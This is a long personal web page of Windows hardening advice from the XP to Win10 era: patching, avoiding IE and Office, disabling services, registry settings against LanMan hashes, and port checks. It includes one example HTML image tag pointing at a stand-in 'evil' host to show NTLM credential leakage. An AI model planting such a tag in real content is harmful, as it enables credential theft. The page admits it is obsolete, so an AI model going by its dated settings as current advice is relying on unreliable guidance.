Secure your PC

OBSOLETE

This page is somewhat obsolete: was essential up to the times of WinXP and Vista, somewhat useful for Win7, and is less relevant for Win10 or 11. Still, you should be familiar with the issues mentioned below.

With all the hullabaloo about the virus or worm du jour, you may want to make your Windows PC more secure. See disclaimer at end.
You should also check out the Australian Cyber guides, the US Cyber Defense pages including their Best Practices for Home suggestions.

Contents

Commonsense, common settings

Anti-Virus issues

Firewall issues

E-commerce and webmail

Backups

Disable unused features

Solution?

28 Oct 24

Install Microsoft patches

Since April 2017, Microsoft moved to a Security Update Guide delivery of patches: not one bulletin per product, but many individual updates for each issue and each specific product version. Thus it is not feasible or useful to maintain a list of patches required; I will only keep a list of "known issues", or issues that show that regular updates are important.

Recent issues (or see full list):

Reference(s):
https://portal.msrc.microsoft.com/en-us/security-guidance
https://portal.msrc.microsoft.com/en-us/security-guidance/summary
https://technet.microsoft.com/en-us/security/advisories
http://blogs.technet.microsoft.com/msrc/
http://blogs.technet.microsoft.com/srd/
http://blogs.technet.microsoft.com/mmpc/

NOTE that on late-model "7th generation" CPUs, Windows10 only is supported, no WindowsUpdates for Win7 and Win8.1: http://support.microsoft.com/help/4012982 (but see also attempts at re-enabling updates).
BEWARE that some patches may make your machine inoperable (e.g. Jul2020 Outlook issues here and here, issues, more with the Oct2018 Win10 updates, or my DellLatitude7390 laptop that in Aug2018 crashes to a blue screen due to some updates, or KB4088875/4088878, KB4074588/KB4058258/KB4056892, KB4049094 or KB4015549).
BEWARE that M$ patches do not address all known vulnerabilities.
BEWARE that installing patches or upgrading M$ software may un-install or un-do seemingly unrelated patches (e.g. re-install outdated Flash or libraries).
BEWARE that installing any patches may overwrite any customizations (may need to undo them to install the patch): re-check and re-do all your changes as below.
BEWARE that M$ often changes the underlying patches without updating the bulletins or KB articles, sometimes changing the file binaries without updating version numbers.
BEWARE that even big companies make mistakes and may release broken or unwanted patches.
NOTE that Windows7 and Office2010 are now out of support, see the Support Lifecycle Index.

USyd users please note the site licences for MS software.

20 Jan 20

Do not use Internet Explorer or Edge

IE has a long history of vulnerabilities, left un-fixed for years: do not use. Note that IE is used for many registered File Types and you may want to remove them, or use regedit to search for and clobber most occurrences of iexplore. It may be best to rename the software so it is not accessible.

Use Mozilla instead.

Note that you still need to keep IE up-to-date with patches, and set secure IE options (even if you do not use IE), for the many Web-enabled applications. Windows Explorer in particular will internally handle HTTP and FTP URLs, disregarding the "URL protocol handler" in the registry, and is certainly unsafe without careful IE option settings. I wonder if Word can do JavaScript or VBS in a safe way... So occasionally you will need to rename the sofware back in place, patch it, start it up and set secure options, then hide it again.
To set secure options, go to Tools > Internet Options, then select Security and Advanced tabs (in Security, set things to Custom to have fun): see

You may also use third-party "IE hardeners":

IE11 (for Win8.1 then Win7) was released Oct-Nov13 with "better compatibility", "state of the art performance" and "advanced consumer security":

Support for versions prior to IE11 has ceased on 12 Jan 2016, see: https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support

In Windows10, IE is replaced by Microsoft Edge that is claimed to be more secure (e.g. note how ActiveX is termed "older, less secure").

Reference(s) (see IE history for more):

27 Sep 22

Do not use Access or Outlook (or Excel or Word)

There are bugs in MSAccess that allow the execution of any VBA macros; bugs remain in Outlook that allow execution of arbitrary code. Do not use: rename Access, Outlook and VBA (also DAO: used in ihackstuff exploit) so they are not accessible. (Do other MS Office components too: at least Excel, preferably most others even Word, at the same time.)
Use OpenOffice instead.

Reference(s):

10 Nov 17

Set Word options

Apply some protection settings in MSWord against harmful macros. (Would be tempting to disable Word along with the rest of MS Office, but...)

Reference(s):

If you use Office XP or 2003, then beware of it sending debugging information, containing your sensitive documents, to Microsoft. Use regedit to set:
for Office XP, DWNeverUpload, DWNoExternalURL, DWNoFileCollection and DWNoSecondLevelCollection to 1 in both [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Common] and [HKEY_USERS\.Default\Software\Policies\Microsoft\Office\10.0\Common];
for Office 2003, QMEnable to 0 in [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common].

Reference(s):

Apply privacy settings, or your document will contain unwanted information.

Reference(s):

9 Jan 13

Banish LanMan passwords

If you use any Windows passwords, e.g. to connect to a Samba server, then ensure that only NTLM or NTLMv2 password hashes are used. The older LM hash is insecure as it can be cracked easily. (Cracking NTLM hashes is significantly harder, see L0phtCrack.) Both LM and NTLM hashes are replayable: there may be no need to crack them. Windows may be tricked into revealing your credentials, e.g. by using  <img src=file:\\evil\pub.gif>  in an HTML email or web page. Use NTLMv2 hashes if possible.

Need to set my Samba server not to accept an LM hash ("lanman auth = no" in smb.conf; check also "min protocol"). This does not buy much per se: if the attacker has the LM hash, then he could crack the password and win; or he could replay the NTLM hash as he is likely to also have that. As the user is likely to have the same password elsewhere, we should protect against crackable LM hashes even if we are vulnerable to NTLM hash replays. Configure clients so they never send an LM hash; by hacking Samba to actively reject users who send an LM hash, clients can be forced to update their settings. - Samba 3.0.5 supports NTLMv2 but not message encryption (Samba 2.2.8a does not support either).

To use NTLMv2 authentication on Win9x, you need to install the Directory Services Client (in Clients\Win9x\Dsclient.exe on the Windows2000 Server CD). You can then un-install this client: the NTLMv2 support files will stay behind. - Seems that Win9x can only do LM or NTLMv2, and cannot do NTLM authentication (which makes sense as the only allowed values of LMCompatibility are 0 or 3). (Samba 2.2.8a and Win9x cannot communicate securely.)

Use regedit to:

Reference(s):

19 Jan 06

Disable unused services

This is a bit long... see sub-sections on services, network and registry settings, see what ports are open, and some further checking.

Services setup

Disable the services you do not need in My Computer (right-click) > Manage > Services and Applications > Services.

My WinXP home computer happily survives with just 

  Name                                  Status  Startup Type

  Application Management                        Disabled
  COM+ Event System                     Started Manual
  DHCP Client                           Started Automatic
  DNS Client                            Started Automatic
  Event Log                             Started Automatic
  Human Interface Device Access                 Disabled
  LexBce Server                         Started Automatic (my Lexmark printer?)
  Messenger                                     Disabled
  Network Connections                   Started Manual
  Network Location Awareness (NLA)      Started Manual
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Connection Manager      Started Manual
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Security Accounts Manager             Started Automatic
  Server                                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Manual
  Task Scheduler                                Disabled
  Telephony                             Started Manual
  Terminal Services                     Started Manual
  Windows Audio                         Started Automatic
  Windows Management Instrumentation    Started Manual
  Workstation                           Started Automatic
(rest are manual startup and not running).

My WinXP work PC (hanging off a Samba PDC) has (excessive, unsafe?) 

  Name                                  Status  Startup Type

  Alerter                               Started Automatic
  Application Layer Gateway Service     Started Manual
  Automatic Updates                             Disabled
  Background Intelligent Transfer Serv          Disabled
  ClipBook                                      Disabled
  COM+ Event System                     Started Manual
  Computer Browser                      Started Automatic
  DCOM Server Process Launcher          Started Automatic
  DHCP Client                           Started Automatic
  DNS Client                                    Disabled
  Error Reporting Service                       Disabled
  Event Log                             Started Automatic
  Help and Support                              Disabled
  HID Input Service                     Started Automatic
  Messenger                             Started Automatic
  MS Software Shadow Copy Provider              Disabled
  Net Logon                             Started Automatic
  NetMeeting Remote Desktop Sharing             Disabled
  Network Connections                   Started Manual
  Network DDE                                   Disabled
  Network DDE DSDM                              Disabled
  Network Location Awareness (NLA)      Started Manual
  Performance Logs and Alerts                   Disabled
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Auto Connection Manager         Disabled
  Remote Access Connection Manager              Disabled
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Secondary Logon                       Started Automatic
  Security Accounts Manager             Started Automatic
  Security Center                               Automatic
  Server                                Started Automatic
  Shell Hardware Detection              Started Automatic
  Smart Card                                    Disabled
  SoundMAX Agent Service                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Automatic
  System Restore Service                        Disabled
  Telnet                                        Disabled
  Terminal Services                     Started Manual
  Themes                                Started Automatic
  User Profile Hive Cleanup             Started Automatic
  Volume Shadow Copy                            Disabled
  WebClient                             Started Automatic
  Windows Audio                         Started Automatic
  Windows Firewall/ICS                  Started Automatic
  Windows Management Instrumentation    Started Manual
  Windows Time                          Started Automatic
  WinMonitor                            Started Automatic (home-grown management)
  Wireless Zero Configuration                   Disabled
  Workstation                           Started Automatic
(rest are manual startup and not running).

Network setup

Find your network connections (devices, interfaces) in
Start Menu > [ Settings or Control Panel ? ] > Network and Dial-up Connections
and their properties in
Local Area Connection > Properties     or
Dial-up > Properties > Networking.
Completely disable unused network interfaces, particularly wireless interfaces on itinerant laptops.
Decide if any are "trusted" networks: your dial-up internet connection is certainly un-trusted. My home PCs trust the LAN interface: my other PC (only) is on that network, and I want them to share everything.

Ensure all un-trusted connections have
File and printer sharing for Microsoft Networks
disabled. You should only have
Client for Microsoft Networks     and
Internet Protocol (TCP/IP)
listed among the protocols/services used. My home PCs show: 

Dial-up, Properties, Networking, "... uses the following items":
    [x]  Internet Protocol (TCP/IP)
    [ ]  File and Printer Sharing for Microsoft Networks
    [x]  Client for Microsoft Networks

Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  File and Printer Sharing for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
while my work PC has 
Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
You should enable File and printer sharing on trusted networks only, and only if you really intend to let anyone see (and delete or change) your files. (It may be possible to have sharing with controls on who can do what, but is beyond my abilities.) You may un-install File and printer sharing if no network interfaces need it. Do not delete Client for Microsoft Networks as some dial-up features rely on it.

Ensure all un-trusted connections have
Disable NetBIOS over TCP/IP
selected in Internet Protocol (TCP/IP) > Properties > Advanced > WINS.
My home PCs have more-or-less: 

Dial-up, Properties, Networking, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Disable NetBIOS over TCP/IP".

Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
Advanced:
  IP 192.168.111.112, netmask 255.255.255.0
  Gateway (none)
  DNS server 192.168.111.111
  WINS server 192.168.111.111
  Enable NetBIOS over TCP/IP
while my work PC has 
Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Use NetBIOS setting from DHCP server".

Registry setup

Use regedit to set: 

 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel=3
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0 (could be 1?)
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\MaxWorkItems=256
 HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SmbDeviceEnabled=0
 HKLM\SYSTEM\CurrentControlSet\Services\Rpc\Linkage\Bind=(empty, REG_MULTI_SZ or REG_SZ)
 HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\ListenOnInternet=N
 HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N
 HKLM\SOFTWARE\Microsoft\Rpc\DCOM Protocols=(not including ncacn_ip_tcp)

Reference(s):

Am I now safe even without MS03-026, MS03-039, MS03-049, MS04-011 or MS04-012 patches in place? My home PC has survived Blaster, Welchia and Sasser; my office machine is behind a firewall, so has not been tested.

Ports open

My home PCs have only a few ports open: 

C:\> netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
  TCP    192.168.111.112:139    0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:1029           *:*                                    796
  UDP    192.168.111.112:137    *:*                                    4
  UDP    192.168.111.112:138    *:*                                    4
(On Win2k use just  netstat -an , or TCPView from http://www.sysinternals.com/ to show process IDs.)

TaskManager shows (among others): 

Image Name      PID     User Name
SVCHOST.EXE     796     NETWORK SERVICE
System          4       SYSTEM

The line
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
is due to the Remote Access Connection Manager service; you need it for dial-up connections (set it to disabled and reboot to see the port go away, along with your dial-up settings). This port seems harmless, not actually open as  telnet localhost 1026  fails, same as any other non-open port. Surely it is a bug in System:4 that it opens but forgets to close the port.

The line
  UDP    0.0.0.0:1029           *:*                                    796
seems to appear some minutes after boot only.

The connections shown by netstat do not change when I dial-up connect.

My work PC has open: 

C:\>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    129.78.94.2:139        0.0.0.0:0              LISTENING
  UDP    129.78.94.2:137        *:*
  UDP    129.78.94.2:138        *:*
Maybe all those are needed...

Further checks

Check the registry for processes started at boot or login time, ensure all are legitimately needed.

Reference(s):

I wonder if it would be possible or useful to set 

 DisableIPSourceRouting=2
 EnableDeadGWDetect=0
 EnableICMPRedirect=0
 EnablePMTUDiscovery=0
 NoNameReleaseOnDemand=1
 PerformRouterDiscovery=0
 SynAttackProtect=2
in both 
 HKLM\System\CurrentControlSet\Services\AFD\Parameters
 HKLM\System\CurrentControlSet\Services\Tcpip\Parameters

Reference(s):

16 May 20

Do not rely on WinXP/Vista/7/8/10 security

Do not assume that WinXP, Vista, Win7, 8 or 10 are secure, but expect local users to easily get "administrator" privileges: Windows has bad design, foolish defaults, and some bugs for attackers to exploit.

Still, you should not normally log in as Administrator, but as some low-level user; and should protect the machine from low-level users, e.g. with sensible file and registry permissions. Then malware will not be able to install themselves as system services (foiling a number of viruses): see e.g.

(Power users getting admin is a "known bug" http://support.microsoft.com/kb/825069 .)

Reference(s):

I fail to see how Windows 2000 got "Common Criteria" certification. Maybe because they assume a "friendly" network and "cooperating" users ... but isn't any computer secure under those circumstances?

Reference(s):

25 Oct 19

Use Firefox, Thunderbird

Use Firefox (browser) and Thunderbird (mail client), and keep them updated to latest version. Mozilla is actively maintained, free of old known bugs.

As mentioned above: turn Java off in Tools > Options > Content.

Reference(s):

Netscape Navigator has reached End of Support and they recommend to use Firefox.

Or you may want to use Chrome or Opera or Safari (all have security problems, I just do not keep track of those).

16 May 18

Use Acrobat DC

There are vulnerabilities in older Acrobat reader versions, use Acrobat Reader DC, updated: see http://get.adobe.com/reader/otherversions (and FTP site).

BEWARE: PDF files may carry active content, so are also dangerous. In Edit > Preferences set:

See also the NSA "Recommendations for Configuring Adobe Acrobat Reader DC in a Windows Environment".

Reference(s):

28 Sep 16

Third party software

Need to keep various other third party software updated.
See sub-sections on Java,
messengers AIM, MSN, YIM, ICQ, mIRC, Skype
and media players RealPlayer, Winamp, Windows Media Player, QuickTime, Flash.

The list here is not exhaustive but only the common software I knew about; and is not in order of importance. Some third party software (IE, Firefox, MSWord, Acrobat, Eudora) singled out elsewhere.

Java or latest needs to be kept up-to-date (and/or removed and/or disabled in the browser).

Reference(s):

There are vulnerabilities in AIM (AOL Instant Messenger).

Reference(s):

Do not use MSN Messenger as it has privacy problems (combine that with cross-site-scripting problems on MS sites...); servers are misconfigured; and it can be hijacked.

Reference(s):

Need to update YIM.

Reference(s):

Need to update ICQ.

Reference(s):

Need to update mIRC.

Reference(s):

Vulnerabilities have been found in Skype, and you should update the software.

Reference(s):

Vulnerabilities have been found in RealPlayer, and you should update the software.

Reference(s):

Vulnerabilities have been found in Winamp, and you should update the software.

Reference(s):

Windows Media Player seems to have security problems: it will run a WMA or WMF file as such, even when renamed; and even though it is not the default MP3 player. Use e.g. RealPlayer or Winamp instead, and un-install WMP. Note also that both WMP and RealPlayer may be "tricked" via files named WAV or MP3 that in fact contain something else.

Reference(s):

Should un-install Apple QuickTime Player: no longer supported or needed on Windows.

Reference(s):

Upgrade Flash and Shockwave players; or remove them altogether...

Reference(s):

1 Jul 13

Beware of long filenames

Long filename extensions: no patch or workaround yet (thankfully no remote exploit either). Explorer crashes, probably exploitable as a buffer overflow encoded into the extension.

Reference(s):

Long NTFS filenames: some software packages (Windows Explorer and CMD.EXE included) may not be able to access long NTFS pathnames.

Reference(s):

20 Jun 00

Disable WSH, VBS, CHM, Scrap

WSH is Windows Script Host. To disable, rename the relevant files; or for Windows 98, un-install it: select Start Menu > Settings > Control Panel > Add/Remove Programs > Windows Setup tab > Accessories and make sure Windows Scripting Host is deselected (no checkmark).

Reference(s):

Delete VBS VBScript (Visual Basic) Script File from the registered File Types list or use regedit to clobber the command to open them, or rename the software so it is not accessible. (VBS files may not be listed after you disabled WSH.) Delete VBE VBScript Encoded Script File also. Other file types (such as REG files) may also be dangerous, and can be removed/clobbered for a more secure system.

Reference(s):

Delete CHM Compiled HTML file from the registered File Types list or clobber the command with regedit, or rename the software so it is not accessible. Note that there are CHM files in C:\windows\help\ and then you may not be able to use them.

Reference(s):

To disable scrap files, alter or remove File Types SHS and SHB or clobber the command shscrap.dll with regedit, or rename the software so it is not accessible.

Reference(s):

14 Feb 01

Un-hide file types

Make Windows show all file types (extensions): EXE files, scrap files, VBS scripts, PIF and LNK file attachments ... (sent by email?).

28 Mar 19

Miscellaneous settings

You may want to be careful with what "legit" software you install. In particular, you may want to turn off autoplay on your CD drive (as mentioned above).

Reference(s):

Under Win2k/NT, a user can lock files so that no other user can access them. (This may include logon scripts and files to set security policies...) This is a Windows design "feature", with no fix planned. (Or, are "group policies" but not logon scripts et al, fixed in MS02-016??)

Reference(s):

Though not security issues, Microsoft should not be rude to its competitors, should not engage in software piracy nor infringe patents.

Reference(s):

21 Nov 22

Physical security

I seem to have neglected physical security. Generally, once an attacker has access to the keyboard/screen of your computer, he can do any "bad things" he likes. Seems that Windows was designed as a single-user machine, the paradigm of "the user is king", with any "security" an after-thought slap-on. You may need to have your computer room locked with a key.

Reference(s):

10 Oct 04

Recover from compromise

If your PC has been compromised (e.g. infected with some virus), and you would like to return it to a safe state, then you really should re-install it from scratch: re-format the hard disk and re-install Windows and all software, from safe media (e.g. original CDs).

If it had been infected with a "known virus" then maybe your anti-virus product can clean it up. However, can you be sure that was the only compromise: that there were no other as-yet-undetected viruses, or maybe some specific (personally directed) malware lurking?

You need to secure your newly installed PC before first connecting it to the internet (e.g. to read these instructions on how to keep it secure, or to use WindowsUpdate): at the height of the Blaster and Sasser worms, unprotected PCs were infected within a minute of connection. Print out these instructions, then re-format and re-install everything, and configure things to keep safe.

Disclaimer

Only Windows PCs are considered here. I do not keep track of Mac or MacOSX or of UNIX or Linux issues. - I only care about two or three kinds of Windows PC: Only issues of relevance to my setups are listed, some generalities first, then in apparently random order. Advice here may not be applicable to some Windows versions or other configurations. In particular I blissfully ignore IIS and SQL.

There are many security issues not covered here, either because I never knew about them, or because I did not think they were relevant to my setups. Do not rely solely on my advice. Conversely, following any advice here may render your computer inoperable. Use at your own risk. - Please let me know if I missed something obvious, or if any of the advice above gave you trouble.

Paul Szabo psz@maths.usyd.edu.au 28 Oct 24